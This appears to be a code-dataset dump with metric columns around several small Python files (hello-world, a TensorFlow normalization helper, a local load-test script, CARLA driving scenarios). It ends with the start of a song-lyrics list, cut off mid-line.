| 0.208333
| 0.277778
| 0.798611
| 0.798611
| 0.798611
| 0.798611
| 0.798611
| 0.798611
| 0
| 0
| 0.188862
| 413
| 7
| 66
| 59
| 0.859701
| 0
| 0
| 0
| 0
| 0
| 0.707729
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
046be22fe1bbb42a1b68cfad3b700349244c1068
| 95
|
py
|
Python
|
hello-world/hello-world.py
|
gabrielcostasilva/python-basic-examples
|
d9c20887b94b823fc59bc82f250d39d76b918ad8
|
[
"MIT"
] | null | null | null |
hello-world/hello-world.py
|
gabrielcostasilva/python-basic-examples
|
d9c20887b94b823fc59bc82f250d39d76b918ad8
|
[
"MIT"
] | null | null | null |
hello-world/hello-world.py
|
gabrielcostasilva/python-basic-examples
|
d9c20887b94b823fc59bc82f250d39d76b918ad8
|
[
"MIT"
] | null | null | null |
# Print a fixed greeting, then greet the user by the name they type in.
print("Hello World Python!")
user_name = input("Start by writing down your name: ")
print("Hello world " + user_name)
| 31.666667
| 65
| 0.705263
| 14
| 95
| 4.785714
| 0.785714
| 0.298507
| 0.447761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136842
| 95
| 2
| 66
| 47.5
| 0.817073
| 0
| 0
| 0
| 0
| 0
| 0.673684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
04bce2462f124d94de2afe9757e48629fd7235c6
| 41
|
py
|
Python
|
setmycfdns/__init__.py
|
Glocktober/setmycfdns
|
d1ad128095a204f1330f024bebff57fe3a3f1ee2
|
[
"MIT"
] | null | null | null |
setmycfdns/__init__.py
|
Glocktober/setmycfdns
|
d1ad128095a204f1330f024bebff57fe3a3f1ee2
|
[
"MIT"
] | null | null | null |
setmycfdns/__init__.py
|
Glocktober/setmycfdns
|
d1ad128095a204f1330f024bebff57fe3a3f1ee2
|
[
"MIT"
] | null | null | null |
# Re-export set_my_cf_dns at package level so callers can simply do
# `from setmycfdns import set_my_cf_dns`.
from .set_my_cf_dns import set_my_cf_dns
| 20.5
| 40
| 0.878049
| 10
| 41
| 3
| 0.6
| 0.333333
| 0.466667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
04c04ca9458bf86727f318f9cc01d9a5750fe5c0
| 108
|
py
|
Python
|
nature/bricks/activations/norm.py
|
bionicles/neuromax
|
a53a17a1c033c11ac607a9e28f43b1f906e58aad
|
[
"MIT"
] | null | null | null |
nature/bricks/activations/norm.py
|
bionicles/neuromax
|
a53a17a1c033c11ac607a9e28f43b1f906e58aad
|
[
"MIT"
] | null | null | null |
nature/bricks/activations/norm.py
|
bionicles/neuromax
|
a53a17a1c033c11ac607a9e28f43b1f906e58aad
|
[
"MIT"
] | null | null | null |
from tensorflow_addons.layers import InstanceNormalization
def Norm():
    """Build and return a fresh InstanceNormalization layer."""
    normalization_layer = InstanceNormalization()
    return normalization_layer
| 18
| 58
| 0.814815
| 10
| 108
| 8.7
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 108
| 5
| 59
| 21.6
| 0.925532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8e1c58e86d1c290b39d6495a444d0371597e944a
| 4,305
|
py
|
Python
|
convlab/human_eval/simulate_conc.py
|
hwaranlee/SUMBT-LaRL
|
822235a2383631a97c49ed6d731b99093d427d6d
|
[
"MIT"
] | 1
|
2021-12-10T05:29:27.000Z
|
2021-12-10T05:29:27.000Z
|
convlab/human_eval/simulate_conc.py
|
hwaranlee/SUMBT-LaRL
|
822235a2383631a97c49ed6d731b99093d427d6d
|
[
"MIT"
] | null | null | null |
convlab/human_eval/simulate_conc.py
|
hwaranlee/SUMBT-LaRL
|
822235a2383631a97c49ed6d731b99093d427d6d
|
[
"MIT"
] | null | null | null |
import time
import json
import random
from urllib.error import URLError
from urllib import request
import http.client
import requests
import gevent
from gevent import monkey
import json
from flask import jsonify
from flask import Flask
# Flask app used only for jsonify/serialization in this script.
app = Flask(__name__)
# Push an application context so Flask helpers (e.g. jsonify) can be used
# outside of a request handler.
ctx = app.app_context()
ctx.push()
# NOTE(review): json was already imported above; this re-import is redundant.
import json
class SetEncoder(json.JSONEncoder):
    """JSON encoder that serializes Python sets as JSON arrays."""

    def default(self, obj):
        # Sets are not natively JSON-serializable; emit them as lists.
        if isinstance(obj, set):
            return list(obj)
        # Defer anything else to the stock encoder (which raises TypeError).
        return super(SetEncoder, self).default(obj)
def run():
    """Simulate one dialogue turn: build a fixed agent state and POST it to the
    local agent service.

    NOTE(review): requires a service listening on localhost:10004; the HTTP
    response is not inspected, so this only exercises the request path.
    """
    # MultiWOZ-style dialogue state: per-domain belief slots, request state,
    # turn history, and previously active domains.
    dst_state = {'user_action': {'Restaurant-Inform': []}, 'belief_state': {'police': {'book': {'booked': []}, 'semi': {}}, 'hotel': {'book': {'booked': [], 'people': '', 'day': '', 'stay': ''}, 'semi': {'name': '', 'area': '', 'parking': '', 'pricerange': '', 'stars': '', 'internet': '', 'type': ''}}, 'attraction': {'book': {'booked': []}, 'semi': {'type': '', 'name': '', 'area': '', 'entrance fee': ''}}, 'restaurant': {'book': {'booked': [], 'people': '', 'day': '', 'time': ''}, 'semi': {'food': '', 'pricerange': '', 'name': '', 'area': ''}}, 'hospital': {'book': {'booked': []}, 'semi': {'department': ''}}, 'taxi': {'book': {'booked': [], 'departure': '', 'destination': ''}, 'semi': {'leaveAt': '', 'arriveBy': ''}}, 'train': {'book': {'booked': [], 'people': '', 'trainID': ''}, 'semi': {'leaveAt': '', 'destination': '', 'day': '', 'arriveBy': '', 'departure': ''}}}, 'request_state': {}, 'history': [['null', 'I want a resturant']], 'prev_domains': ['Restaurant']}
    # Binary-encoded dialogue state vector — presumably the DST model's encoding
    # of dst_state; TODO confirm against the service's expected input.
    encoded_state = [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0]
    output = {
        'response': 'hi',
        'agent_state': (encoded_state, dst_state, 164)
    }
    # Round-trip through Flask's jsonify to mimic the service's JSON encoding;
    # relies on the app context pushed at module import time.
    a_s = jsonify(output).json()['agent_state']
    # NOTE(review): these two serialized copies are never used afterward —
    # the request below uses a_s only. Looks like dead code; confirm before removing.
    dst_state = json.dumps(dst_state)
    encoded_state = json.dumps(encoded_state)
    resp = requests.post('http://localhost:10004', json={'input': 'I want a resturant',
                                                         'agent_state': a_s})
def call_gevent(count):
    """Spawn ``count`` greenlets running :func:`run` to simulate concurrent load.

    (Original docstring: "调用gevent 模拟高并发" — "use gevent to simulate
    high concurrency".)

    Prints per-request and total wall-clock timings.

    :param count: number of concurrent simulated clients to launch.
    """
    begin_time = time.time()
    run_gevent_list = []
    for i in range(count):
        print('--------------%d--Test-------------' % i)
        # BUG FIX: the original called gevent.spawn(run()), which executed
        # run() synchronously in this loop and spawned a greenlet around its
        # None return value — no concurrency at all. Pass the callable itself.
        run_gevent_list.append(gevent.spawn(run))
    gevent.joinall(run_gevent_list)
    end = time.time()
    print('single s:', (end - begin_time) / count)
    print('all:', end - begin_time)
# Entry point: launch the load simulation with 10 concurrent clients.
# NOTE(review): runs on import — consider an `if __name__ == "__main__":` guard.
call_gevent(10)
| 86.1
| 1,981
| 0.482462
| 1,034
| 4,305
| 1.976789
| 0.105416
| 0.705479
| 1.01272
| 1.289628
| 0.383562
| 0.383562
| 0.383562
| 0.383562
| 0.383562
| 0.381115
| 0
| 0.231217
| 0.202323
| 4,305
| 50
| 1,982
| 86.1
| 0.364007
| 0.003252
| 0
| 0.068182
| 0
| 0
| 0.140666
| 0.008261
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0
| 0.295455
| 0
| 0.431818
| 0.068182
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e316d70de0a7dff7d24ae847e16705fbd3fd438
| 14,004
|
py
|
Python
|
srunner/scenarios/cff_tests.py
|
Soolek/scenario_runner
|
7a50628b50e9458ab2895ce252cf882f55731717
|
[
"MIT"
] | null | null | null |
srunner/scenarios/cff_tests.py
|
Soolek/scenario_runner
|
7a50628b50e9458ab2895ce252cf882f55731717
|
[
"MIT"
] | null | null | null |
srunner/scenarios/cff_tests.py
|
Soolek/scenario_runner
|
7a50628b50e9458ab2895ce252cf882f55731717
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from six.moves.queue import Queue # pylint: disable=relative-import
import math
import py_trees
import carla
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
from srunner.scenariomanager.scenarioatomics.atomic_behaviors import (ActorTransformSetter,
ActorDestroy,
ActorSource,
ActorSink,
WaypointFollower,
StopVehicle,
ChangeActorTargetSpeed,
KeepVelocity,
DriveAtUntil,
SyncArrival,
Idle)
from srunner.scenariomanager.scenarioatomics.atomic_criteria import CollisionTest, DrivenDistanceTest, MaxVelocityTest
from srunner.scenariomanager.scenarioatomics.atomic_trigger_conditions import DriveDistance, InTriggerDistanceToVehicle
from srunner.scenarios.basic_scenario import BasicScenario
from srunner.tools.scenario_helper import (get_waypoint_in_distance,
get_geometric_linear_intersection)
class CFFNudge(BasicScenario):
    """Scenario in which the ego vehicle simply has to drive 140 m."""

    def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
                 timeout=120):
        self._world = world
        self._map = CarlaDataProvider.get_map()
        self._drivenDistanceM = 140
        # Scenario timeout in seconds.
        self.timeout = timeout
        super(CFFNudge, self).__init__(
            "CFFNudge",
            ego_vehicles,
            config,
            world,
            debug_mode,
            criteria_enable=criteria_enable)

    def _initialize_actors(self, config):
        # Spawn each actor declared in the scenario configuration (XML).
        for actor_cfg in config.other_actors:
            spawned = CarlaDataProvider.request_new_actor(actor_cfg.model, actor_cfg.transform)
            spawned.set_simulate_physics(enabled=True)
            self.other_actors.append(spawned)

    def _create_behavior(self):
        # Single-step behavior: succeed once the ego has covered the distance.
        drive = DriveDistance(
            self.ego_vehicles[0],
            self._drivenDistanceM,
            name="DriveDistance")
        root = py_trees.composites.Sequence("Sequence Behavior")
        root.add_child(drive)
        return root

    def _create_test_criteria(self):
        # Fail on any collision; check the required distance was actually driven.
        return [
            CollisionTest(self.ego_vehicles[0]),
            DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM),
        ]

    def __del__(self):
        """Remove all actors upon deletion."""
        self.remove_all_actors()
class CFFPeturbation(BasicScenario):
    """Scenario: ego closes in on the other actor, then drives 40 m further."""

    def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
                 timeout=120):
        self._world = world
        self._map = CarlaDataProvider.get_map()
        self._drivenDistanceM = 40
        # Scenario timeout in seconds.
        self.timeout = timeout
        super(CFFPeturbation, self).__init__(
            "CFFPeturbation",
            ego_vehicles,
            config,
            world,
            debug_mode,
            criteria_enable=criteria_enable)

    def _initialize_actors(self, config):
        # Spawn each actor declared in the scenario configuration (XML).
        for actor_cfg in config.other_actors:
            spawned = CarlaDataProvider.request_new_actor(actor_cfg.model, actor_cfg.transform)
            spawned.set_simulate_physics(enabled=True)
            self.other_actors.append(spawned)

    def _create_behavior(self):
        # Phase 1: approach the other actor at 4 m/s until within 7 m.
        # Phase 2: continue until the total scenario distance is covered.
        root = py_trees.composites.Sequence("Sequence Behavior")
        root.add_child(DriveAtUntil(self.ego_vehicles[0], self.other_actors[0], speedMs=4, untilDistance=7))
        root.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
        return root

    def _create_test_criteria(self):
        # Fail on any collision; check the required distance was actually driven.
        return [
            CollisionTest(self.ego_vehicles[0]),
            DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM),
        ]

    def __del__(self):
        """Remove all actors upon deletion."""
        self.remove_all_actors()
class CFFSlowDown(BasicScenario):
    """Scenario: ego catches up with a slower lead vehicle, then follows it."""

    def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
                 timeout=120):
        self._world = world
        self._map = CarlaDataProvider.get_map()
        self._speed = 8
        self._drivenDistanceM = 50
        # Scenario timeout in seconds.
        self.timeout = timeout
        super(CFFSlowDown, self).__init__(
            "CFFSlowDown",
            ego_vehicles,
            config,
            world,
            debug_mode,
            criteria_enable=criteria_enable)

    def _initialize_actors(self, config):
        # Spawn each actor declared in the scenario configuration (XML).
        for actor_cfg in config.other_actors:
            spawned = CarlaDataProvider.request_new_actor(actor_cfg.model, actor_cfg.transform)
            spawned.set_simulate_physics(enabled=True)
            self.other_actors.append(spawned)

    def _create_behavior(self):
        # Planar spawn-time gap between ego and lead vehicle.
        # NOTE(review): this method reads self.config, unlike the sibling
        # scenarios which receive config as a parameter — assumes BasicScenario
        # stores the config on the instance; confirm.
        ego_loc = self.config.ego_vehicles[0].transform.location
        lead_loc = self.config.other_actors[0].transform.location
        gap_m = math.sqrt((ego_loc.x - lead_loc.x) ** 2 + (ego_loc.y - lead_loc.y) ** 2)
        # Catch-up speed scales with the initial gap.
        catchup_speed_ms = self._speed + gap_m / 5

        root = py_trees.composites.Sequence("Sequence Behavior")

        # Phase 1: ego drives faster than the lead until it is close enough,
        # while the lead follows its waypoints at the slow speed.
        catch_up = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
        catch_up.add_child(DriveAtUntil(self.ego_vehicles[0], self.other_actors[0], speedMs=catchup_speed_ms, untilDistance=7 + gap_m / 5))
        catch_up.add_child(WaypointFollower(self.other_actors[0], self._speed, avoid_collision=False))
        root.add_child(catch_up)

        # Phase 2: keep following the lead until the ego covers the scenario distance.
        follow = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
        follow.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
        follow.add_child(WaypointFollower(self.other_actors[0], self._speed, avoid_collision=False))
        root.add_child(follow)
        return root

    def _create_test_criteria(self):
        # Fail on any collision; check the required distance was actually driven.
        return [
            CollisionTest(self.ego_vehicles[0]),
            DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM),
        ]

    def __del__(self):
        """Remove all actors upon deletion."""
        self.remove_all_actors()
class CFFWang2019_1(BasicScenario):
    """Scenario: ego drives 300 m while two other actors hold 10 m/s."""

    def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
                 timeout=120):
        self._world = world
        self._map = CarlaDataProvider.get_map()
        self._drivenDistanceM = 300
        # Scenario timeout in seconds.
        self.timeout = timeout
        super(CFFWang2019_1, self).__init__(
            "CFFWang2019_1",
            ego_vehicles,
            config,
            world,
            debug_mode,
            criteria_enable=criteria_enable)

    def _initialize_actors(self, config):
        # Spawn each actor declared in the scenario configuration (XML).
        for actor_cfg in config.other_actors:
            spawned = CarlaDataProvider.request_new_actor(actor_cfg.model, actor_cfg.transform)
            spawned.set_simulate_physics(enabled=True)
            self.other_actors.append(spawned)

    def _create_behavior(self):
        # Both other actors hold constant velocity; the parallel ends as soon
        # as the ego has covered the scenario distance.
        race = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
        race.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
        race.add_child(KeepVelocity(self.other_actors[0], 10))
        race.add_child(KeepVelocity(self.other_actors[1], 10))
        root = py_trees.composites.Sequence("Sequence Behavior")
        root.add_child(race)
        return root

    def _create_test_criteria(self):
        # Fail on any collision; check the required distance was actually driven.
        return [
            CollisionTest(self.ego_vehicles[0]),
            DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM),
        ]

    def __del__(self):
        """Remove all actors upon deletion."""
        self.remove_all_actors()
class CFFWang2019_2(BasicScenario):
    """Scenario: ego approaches a slow lead while a second actor passes, then
    drives 300 m as both other actors speed up."""

    def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
                 timeout=120):
        self._world = world
        self._map = CarlaDataProvider.get_map()
        self._drivenDistanceM = 300
        # Scenario timeout in seconds.
        self.timeout = timeout
        super(CFFWang2019_2, self).__init__(
            "CFFWang2019_2",
            ego_vehicles,
            config,
            world,
            debug_mode,
            criteria_enable=criteria_enable)

    def _initialize_actors(self, config):
        # Spawn each actor declared in the scenario configuration (XML).
        for actor_cfg in config.other_actors:
            spawned = CarlaDataProvider.request_new_actor(actor_cfg.model, actor_cfg.transform)
            spawned.set_simulate_physics(enabled=True)
            self.other_actors.append(spawned)

    def _create_behavior(self):
        root = py_trees.composites.Sequence("Sequence Behavior")

        # Phase 1: ego closes to within 50 m of the first actor (5 m/s) while
        # the second actor travels at 7.5 m/s.
        phase1 = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
        phase1.add_child(DriveAtUntil(self.ego_vehicles[0], self.other_actors[0], speedMs=8, untilDistance=50))
        phase1.add_child(KeepVelocity(self.other_actors[0], 5))
        phase1.add_child(KeepVelocity(self.other_actors[1], 7.5))
        root.add_child(phase1)

        # Phase 2: first actor follows waypoints at 10 m/s, second speeds up to
        # 25 m/s, until the ego has covered the scenario distance.
        phase2 = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
        phase2.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
        phase2.add_child(WaypointFollower(self.other_actors[0], 10, avoid_collision=True))
        phase2.add_child(KeepVelocity(self.other_actors[1], 25))
        root.add_child(phase2)
        return root

    def _create_test_criteria(self):
        # Fail on any collision; check the required distance was actually driven.
        return [
            CollisionTest(self.ego_vehicles[0]),
            DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM),
        ]

    def __del__(self):
        """Remove all actors upon deletion."""
        self.remove_all_actors()
class CFFLim2018(BasicScenario):
    """Intersection scenario: another vehicle is synchronized to arrive near a
    computed collision point, then stops while the ego drives on."""

    def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
                 timeout=120):
        self._world = world
        self._map = CarlaDataProvider.get_map()
        self._drivenDistanceM = 80
        # Scenario timeout in seconds.
        self.timeout = timeout
        super(CFFLim2018, self).__init__(
            "CFFLim2018",
            ego_vehicles,
            config,
            world,
            debug_mode,
            criteria_enable=criteria_enable)
        # Force the ego's next traffic light to green for the whole scenario.
        self._traffic_light = CarlaDataProvider.get_next_traffic_light(self.ego_vehicles[0], False)
        self._traffic_light.set_state(carla.TrafficLightState.Green)
        self._traffic_light.set_green_time(timeout)

    def _initialize_actors(self, config):
        # Spawn each actor declared in the scenario configuration (XML).
        for actor_cfg in config.other_actors:
            spawned = CarlaDataProvider.request_new_actor(actor_cfg.model, actor_cfg.transform)
            spawned.set_simulate_physics(enabled=True)
            self.other_actors.append(spawned)

    def _create_behavior(self):
        root = py_trees.composites.Sequence("Sequence Behavior")

        # Geometric intersection of the two trajectories, shifted 3 m back on x.
        meet_point = get_geometric_linear_intersection(self.ego_vehicles[0], self.other_actors[0])
        meet_point.x -= 3

        # Phase 1: other vehicle synchronizes its arrival with the ego until the
        # two are within 12 m of each other.
        approach = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
        approach.add_child(InTriggerDistanceToVehicle(self.ego_vehicles[0], self.other_actors[0], 12))
        approach.add_child(SyncArrival(self.other_actors[0], self.ego_vehicles[0], meet_point))
        root.add_child(approach)

        # Phase 2: other vehicle brakes to a stop AND the ego covers the
        # remaining distance (both must finish — SUCCESS_ON_ALL).
        finish = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ALL)
        finish.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
        finish.add_child(StopVehicle(self.other_actors[0], 1.0))
        root.add_child(finish)
        return root

    def _create_test_criteria(self):
        # Fail on any collision; check the required distance was actually driven.
        return [
            CollisionTest(self.ego_vehicles[0]),
            DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM),
        ]

    def __del__(self):
        """Remove all actors upon deletion."""
        self.remove_all_actors()
| 36.563969
| 137
| 0.648672
| 1,432
| 14,004
| 6.046089
| 0.111732
| 0.048279
| 0.036036
| 0.0462
| 0.826865
| 0.807808
| 0.807808
| 0.802264
| 0.77131
| 0.742204
| 0
| 0.014706
| 0.271637
| 14,004
| 382
| 138
| 36.659686
| 0.834118
| 0.044773
| 0
| 0.717647
| 0
| 0
| 0.013915
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.039216
| 0
| 0.227451
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e3d44218691018b39f7e037e6c414ad0f4efa30
| 37
|
py
|
Python
|
package/sound/formats/waveForamt.py
|
ankitbharti1994/Python
|
86308694cc13910850dc9bd69f6f0d1eaac69bcf
|
[
"Apache-2.0"
] | null | null | null |
package/sound/formats/waveForamt.py
|
ankitbharti1994/Python
|
86308694cc13910850dc9bd69f6f0d1eaac69bcf
|
[
"Apache-2.0"
] | null | null | null |
package/sound/formats/waveForamt.py
|
ankitbharti1994/Python
|
86308694cc13910850dc9bd69f6f0d1eaac69bcf
|
[
"Apache-2.0"
] | null | null | null |
def showType():
    """Return the human-readable name of this audio format."""
    format_name = 'Wav Type'
    return format_name
| 18.5
| 21
| 0.648649
| 5
| 37
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216216
| 37
| 2
| 21
| 18.5
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
8e46906dca96b55fd8ea724e8d01158bfc9992e5
| 156,848
|
py
|
Python
|
lyric_gen/billie/sample_lyric.py
|
yoonhoelee/bidirectional_LSTM_model_for_lyric_genearation
|
83963f9159e2db6733f8fcc86beb24477811e13e
|
[
"MIT"
] | null | null | null |
lyric_gen/billie/sample_lyric.py
|
yoonhoelee/bidirectional_LSTM_model_for_lyric_genearation
|
83963f9159e2db6733f8fcc86beb24477811e13e
|
[
"MIT"
] | null | null | null |
lyric_gen/billie/sample_lyric.py
|
yoonhoelee/bidirectional_LSTM_model_for_lyric_genearation
|
83963f9159e2db6733f8fcc86beb24477811e13e
|
[
"MIT"
] | null | null | null |
dr10 = ["hey girl do you want my number that way you can call me every time i come into town and then i will drive up to your house and take you out to dinner i dont expect nothin at all but what if we happen to kiss and we touch put a rush on it and get it over with or what if i just know what you like and it feels right then its over with what if i don't call you back prove you right all this lasts just one night maybe we should slow it down slow slow slow hey girl i'm back in atlanta second dates are lovely this time you should choose were we go need suggestions how about the movies mini golf or ice cream i'm not picky you let me know but what if we happen to kiss and we touch put a rush on it and get it over with what if i just know what you like and it feels right then its over with what if i don't call you back prove you right all this lasts just one night maybe we should slow it down slow slow slow but what if we happen to kiss and we touch put a rush on it and get it over with what if i just know what you like and it feels right then its over with what if i don't call you back prove you right all this lasts just one night maybe we should slow it down slow slow slow ayobi yeah yeah yeah i see changes alright bottles on me long as someone drink it never drop the ball fuck are y'all thinking making sure the young money ship is never sinking about to set it off in this bitch jada pinkett i shouldn't have drove tell me how i'm getting home you too fine to be laying down in bed alone i could teach you how to speak my language rosetta stone i swear this life is like the sweetest thing i've ever known about to go thriller mike jackson on these niggas all i need's a 